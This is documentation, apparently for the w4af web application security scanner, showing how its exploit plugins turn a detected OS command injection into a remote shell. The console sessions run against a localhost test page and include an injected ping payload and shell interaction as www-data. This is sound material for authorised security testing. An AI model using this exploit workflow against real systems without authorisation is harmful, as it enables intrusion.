Exploiting Web application vulnerabilities
==========================================

``w4af`` allows users to exploit Web application vulnerabilities in an automated
manner. The vulnerabilities to be exploited can be identified using ``audit``
plugins or manually by the user (and then the vulnerability details are provided
to ``w4af``).

During the scan vulnerabilities are found and stored in specific locations of
the knowledge base, from where exploit plugins can read and use the stored
information to exploit the vulnerability. Exploiting a vulnerability identified
by an audit plugin is easy:

.. code-block:: none

    w4af>>> plugins
    w4af/plugins>>> audit os_commanding
    w4af/plugins>>> back
    w4af>>> target
    w4af/config:target>>> set target http://localhost/w4af/os_commanding/v.php?command=f0as9
    w4af/config:target>>> back
    w4af>>> start
    Found 1 URLs and 1 different points of injection.
    The list of URLs is:
    - http://localhost/w4af/os_commanding/v.php
    The list of fuzzable requests is:
    - http://localhost/w4af/os_commanding/v.php | Method: GET | Parameters: (command)
    Starting os_commanding plugin execution.
    OS Commanding was found at: "http://localhost/w4af/os_commanding/v.php", using HTTP method GET.
    The sent data was: "command=+ping+-c+9+localhost". The vulnerability was found in the request with id 5.
    Finished scanning process.
    w4af>>> exploit
    w4af/exploit>>> exploit os_commanding
    os_commanding exploit plugin is starting.
    Vulnerability successfully exploited. This is a list of available shells:
    - [0] <os_commanding_shell object (ruser: "www-data" | rsystem: "Linux brick 2.6.24-19")>
    Please use the interact command to interact with the shell objects.
    w4af/exploit>>> interact 0
    Execute "end_interaction" to get out of the remote shell.
    Commands typed in this menu will run on the remote web server.
    w4af/exploit/os_commanding-0>>> ls
    v.php
    v2.php
    v3.php
    w4af/exploit/os_commanding-0>>> end_interaction
    w4af/exploit>>> back
    w4af>>>

Exploiting one you've found manually, requires you to provide some input:

.. code-block:: none

    w4af>>> kb
    w4af/kb>>> help
    | list            | List the items in the knowledge base.
    | add             | Add a vulnerability to the KB
    w4af/kb>>> add os_commanding 
    w4af/kb/config:os_commanding>>> view
    | operating_system         | Remote operating system (linux or windows).
    | name                     | Vulnerability name (eg. SQL Injection)
    | url                      | URL (without query string parameters)
    | vulnerable_parameter     | Vulnerable parameter
    | separator                | Command separator used for injecting commands.
    | data                     | Query string or postdata parameters in url-encoded form
    | method                   | HTTP method
    w4af/kb/config:os_commanding>>> 

You simply ``set`` all the configuration settings and then execute ``save`` and
``back`` to store your vulnerability in the knowledge base. Once the information
is there you'll be able to follow the same steps:

.. code-block:: none

    w4af>>> exploit
    w4af/exploit>>> exploit os_commanding
    os_commanding exploit plugin is starting.
    Vulnerability successfully exploited. This is a list of available shells:
    - [0] <os_commanding_shell object (ruser: "www-data" | rsystem: "Linux brick 2.6.24-19")>
    Please use the interact command to interact with the shell objects.